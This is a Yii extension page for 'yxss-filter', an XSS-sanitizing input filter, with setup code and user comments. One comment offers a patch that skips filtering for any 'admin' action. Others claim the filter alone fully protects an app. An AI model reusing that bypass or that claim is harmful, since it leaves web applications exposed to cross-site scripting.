yxss-filter

Use Kohana regexp to sanitize all user input
6 followers

This extension is sanitize all user input

Resources

Documentation

Requirements

* Yii 1.0 or above

Installation

* Extract the release file under protected/filters

Usage

Add the following code to your controller.

 public function filters()
 {
            return array(
                    array(
                          'application.filters.YXssFilter',
                          'clean'   => '*',
                          'tags'    => 'strict',
                          'actions' => 'all'
                    )
            );

 }

Change Log

September 10, 2009

  • Initial release.

Total 5 comments

#4240 report it
drumaddict at 2011/06/19 07:21am
<?php ?> tags NOT removed.

The extension is great and all,but in section just below the // Remove really unwanted tags comment, why are

<?php ?>

tags not removed??I tested and inserted php tags in a field,and they were not cleaned...

#4029 report it
jeremy at 2011/05/30 03:45pm
problem using < comparison operator in filters and searches

I still like this extension very much. But if one filters all input types (GET, POST, etc) and all actions, then comparison operations beginning with < do not work. In STRICT mode, PHP strip_tags treats anything starting with < as a tag, and strips to the next whitespace. In SOFT mode, < is changed into < which does not match the regex in CDbCriteria.compare().

My solution was to add logic to preFilter(), to not filter data coming from the 'Admin' action:

if($this->actions != '*' && $this->actions != 'ALL' && !in_array($filterChain->action->id,explode(',',$this->actions)))
{
    return true;
}
 
// + JJD
if (strtolower($filterChain->action->id) == 'admin')
    return true;

This seems like an acceptable compromise to allow use of comparison operators in filters, and still keeps security in the rest of the app.

#3224 report it
jeremy at 2011/03/26 04:43pm
VERY helpful

I put this in my base-controller class from which all other controllers extend. Simple. Now my entire app is protected. From reading the docs for CHtmlPurifier, which does the same thing, it appeared that component performs poorly. So far haven't noticed any performance impact using YXssFilter.

#950 report it
someone at 2010/01/22 02:35am
Thanks!

Thanks a lot for this filter! It's very useful. "must have"

#1316 report it
Bethrezen at 2009/09/16 10:40am
Great work!

Great work, Andrew!

Leave a comment

Please to leave your comment.

Create extension
Downloads
  • License: New BSD License
  • Developed by: xomaa
  • Category: Security
  • Votes: +4 / -1
  • Downloaded: 713 times
  • Created on: Sep 10, 2009
  • Last updated: Sep 10, 2009